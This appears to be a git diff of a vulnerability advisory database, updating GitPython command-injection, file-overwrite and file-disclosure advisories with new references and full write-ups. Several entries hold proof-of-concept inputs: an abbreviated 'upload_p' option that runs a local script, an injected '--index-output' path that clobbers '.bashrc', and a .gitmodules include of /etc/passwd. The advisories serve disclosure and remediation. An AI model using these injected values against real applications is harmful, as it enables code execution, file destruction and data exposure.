|\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", + "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2f96-g7mh-g2hx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67325" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2161" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-option-prefix-abbreviation" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-73619.json b/advisories/BREW-fdroidserver-CVE-2026-73619.json index 0489085b95..39bb7be2c5 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73619.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73619.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73619", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-539m-9xh6-q6rr", - "CVE-2026-73619" + "CVE-2026-73619", + "PYSEC-2026-3948" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-73620.json b/advisories/BREW-fdroidserver-CVE-2026-73620.json index 06a0befae4..34bc027b1b 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73620.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73620.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73620", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-3f7w-8rr8-f37f", - "CVE-2026-73620" + "CVE-2026-73620", + "PYSEC-2026-3949" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-73621.json b/advisories/BREW-fdroidserver-CVE-2026-73621.json index b64cc11189..54df2e12e8 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73621.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73621.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73621", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-p538-c434-8v24", - "CVE-2026-73621" + "CVE-2026-73621", + "PYSEC-2026-3950" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-73622.json b/advisories/BREW-fdroidserver-CVE-2026-73622.json index 0b8d0c541a..7af9b0f248 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73622.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73622.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73622", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-94p4-4cq8-9g67", - "CVE-2026-73622" + "CVE-2026-73622", + "PYSEC-2026-3951" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-73623.json b/advisories/BREW-fdroidserver-CVE-2026-73623.json index 295687b740..2987f79abd 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73623.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73623.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73623", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-6p8h-3wgx-97gf", - "CVE-2026-73623" + "CVE-2026-73623", + "PYSEC-2026-3952" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-73625.json b/advisories/BREW-fdroidserver-CVE-2026-73625.json index b992b592ab..8a3882e915 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-73625.json +++ b/advisories/BREW-fdroidserver-CVE-2026-73625.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-73625", "published": "2026-08-14T08:59:51Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-r9mr-m37c-5fr3", - "CVE-2026-73625" + "CVE-2026-73625", + "PYSEC-2026-3953" ], "affected": [ { diff --git a/advisories/BREW-fdroidserver-CVE-2026-76217.json b/advisories/BREW-fdroidserver-CVE-2026-76217.json index bdf71bcfc7..e8b26b3030 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76217.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76217.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76217", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-hh9p-6wh2-4mfc", - "CVE-2026-76217" + "CVE-2026-76217", + "PYSEC-2026-3841" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hh9p-6wh2-4mfc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76217" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-pathspec-from-file" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-76218.json b/advisories/BREW-fdroidserver-CVE-2026-76218.json index eb600ae006..308c9b27ef 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76218.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76218.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76218", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-9rj7-rf2p-w77r", - "CVE-2026-76218" + "CVE-2026-76218", + "PYSEC-2026-3840" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-9rj7-rf2p-w77r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76218" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-repo-init" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-76219.json b/advisories/BREW-fdroidserver-CVE-2026-76219.json index fb73d2ec8f..1305b0ee55 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76219.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76219.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76219", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-4gmw-gg2m-w46p", - "CVE-2026-76219" + "CVE-2026-76219", + "PYSEC-2026-3838" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Unguarded git read-tree option forwarding in IndexFile.from_tree/reset/merge_tree enables arbitrary file overwrite", - "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-4gmw-gg2m-w46p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76219" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-overwrite-via-read-tree" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-76220.json b/advisories/BREW-fdroidserver-CVE-2026-76220.json index 0ceef75482..b6eca9aec7 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76220.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76220.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76220", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-wvpp-8hx9-p66j", - "CVE-2026-76220" + "CVE-2026-76220", + "PYSEC-2026-3843" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wvpp-8hx9-p66j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76220" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-execution-via-split-single-char-options" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-76221.json b/advisories/BREW-fdroidserver-CVE-2026-76221.json index a47b0aad7d..3f6105ff79 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76221.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76221", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-jm78-9fvv-mhgr", "CVE-2026-76221", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-76222.json b/advisories/BREW-fdroidserver-CVE-2026-76222.json index c03d0207f3..f3168eb1e4 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-76222.json +++ b/advisories/BREW-fdroidserver-CVE-2026-76222.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-76222", "published": "2026-08-20T08:51:09Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-hmq2-w58f-27jc", "CVE-2026-76222", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", @@ -73,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hmq2-w58f-27jc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76222" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2202" @@ -92,6 +88,14 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3784.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-gitmodules-submodule-name" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-78675.json b/advisories/BREW-fdroidserver-CVE-2026-78675.json index d79d970ce1..883ccae1da 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-78675.json +++ b/advisories/BREW-fdroidserver-CVE-2026-78675.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-78675", "published": "2026-09-04T08:59:24Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "PYSEC-2026-3785", "CVE-2026-78675", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.", + "summary": "GitPython: Arbitrary local file content disclosure via [include] directive in untrusted .gitmodules (SubmoduleConfigParser never disables merge_includes)", + "details": "# [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)\n\n- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)\n- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` (\"Disable merge_includes in config writers\"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).\n\nThat fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.\n\n`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.\n\nOnce opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `\"File contains no section headers.\\nfile: %r, line: %d\\n%r\" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.\n\n## Root cause\nParity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules//config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)\n\n## Exploit path\n1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:\n ```\n [include]\n \tpath = /etc/passwd\n ```\n (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).\n2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.\n3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.\n4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).\n\n## Impact\nNon-blind local file content disclosure 